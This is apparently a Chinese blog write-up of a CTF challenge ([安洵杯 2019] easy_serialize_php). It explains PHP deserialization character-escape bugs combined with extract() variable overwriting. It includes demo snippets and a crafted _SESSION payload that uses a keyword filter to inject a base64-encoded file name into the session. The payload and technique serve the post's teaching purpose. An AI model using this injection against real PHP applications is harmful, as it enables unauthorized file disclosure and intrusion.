当前位置:网站首页>反序列化字符逃逸漏洞之
反序列化字符逃逸漏洞之
2022-08-04 05:45:00 【一只Traveler】
参考:[安洵杯 2019]easy_serialize_php_甜筒化了 -的博客-CSDN博客_easy_serialize_php
知识点:
extract()变量覆盖
反序列化字符逃逸;
什么意思呢,就是说当进行反序列化数组的时候,只认前面一个括号里面的内容;例如;
<?php
$b='a:1:{s:2:"ei";s:5:"fjksj";}';
var_dump(unserialize($b)) ;
$c='a:1:{s:2:"ei";s:5:"fjksj";}dfjhgksaasdhgerakdj'; //在后面添加了一些干扰字符
var_dump(unserialize($c)) ;
结果:
结果是不变的;
那么如果当序列化后的字符串经过一些函数过滤掉一些字符会发生什么呢;因为序列化后的字符是按照要求严格执行的,什么意思,就是s:1:"a" ; 这个1指得是字符串长度,它会自动往后面截取;
所以通过这两个规则利用起来就可以构造我们想要的东西;
这就是反序列化字符逃逸;
和变量覆盖怎么用?
变量覆盖是直接将之前的值取代,这里就可以作为 键逃逸;没有变量覆盖就值逃逸;
至于构造过程参考上述 :
键逃逸:
_SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
这里构造出来的session字典值就只有一个,就是
flagphp->;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
然而当经过
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
之后增加了img->base64_encode('guest_img.png');
此时serialize($_SESSION)的值就是:
a:2:{s:7:"flagphp";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
但是经过
filter(serialize($_SESSION));
就会把第一个flagphp吃掉;
所以变为:
a:2:{s:7:"";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
再经过反序列化之后最后的";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}就会被忽略掉;
这就改变了session的键值:
";s:48: ——>a
img——>ZDBnM19mMWFnLnBocA==
直接改变img不就可以了嘛!!!
边栏推荐
猜你喜欢
基于时序模式注意力机制(TPA)的长短时记忆(LSTM)网络TPA-LSTM的多变量输入风电功率预测
YOLOv3详解:从零开始搭建YOLOv3网络
Base64编码原理
如何用matlab做高精度计算?【第三辑】(完)
nacos 返回 403 unknown user 太他么坑了 源码解析
Database: Organize Four Practical SQL Server Scripting Functions
Error occurred while trying to proxy request项目突然起不来了
数据库:整理四个实用的SQLServer脚本函数
数据库技巧:整理SQLServer非常实用的脚本
Software: Recommend a domestic and very easy-to-use efficiency software uTools to everyone
随机推荐
MySQL重置root密码
Database: Organize Four Practical SQL Server Scripting Functions
数据库:整理四个实用的SQLServer脚本函数
A priori box (Anchor) in target detection
ThreadLocal内存泄漏问题讲解
如何用matlab做高精度计算?【第一辑】
MAML原理讲解和代码实现
Computer knowledge: desktop computers should choose the brand and assembly, worthy of collection
元素的增删克隆以及利用增删来显示数据到页面上
Based on the EEMD + + MLR GRU helped time series prediction
数据特征预处理——缺失值的查看方式及处理
SQL存储过程详解
“需求370解决解决爬取章节之后主题讨论评论消失问题”工作总结
如何用matlab做高精度计算?【第二辑】
U-Net详解:为什么它适合做医学图像分割?(基于tf-Kersa复现代码)
电脑知识:台式电脑应该选择品牌和组装,值得收藏
Computer software: recommend a disk space analysis tool - WizTree
MAML principle explanation and code implementation
MATLAB版量化交易技术分析工具TA-Lib【不付费也可获取,不要被付费吓跑】
软件:给大家推荐一款国产非常好用的效率软件uTools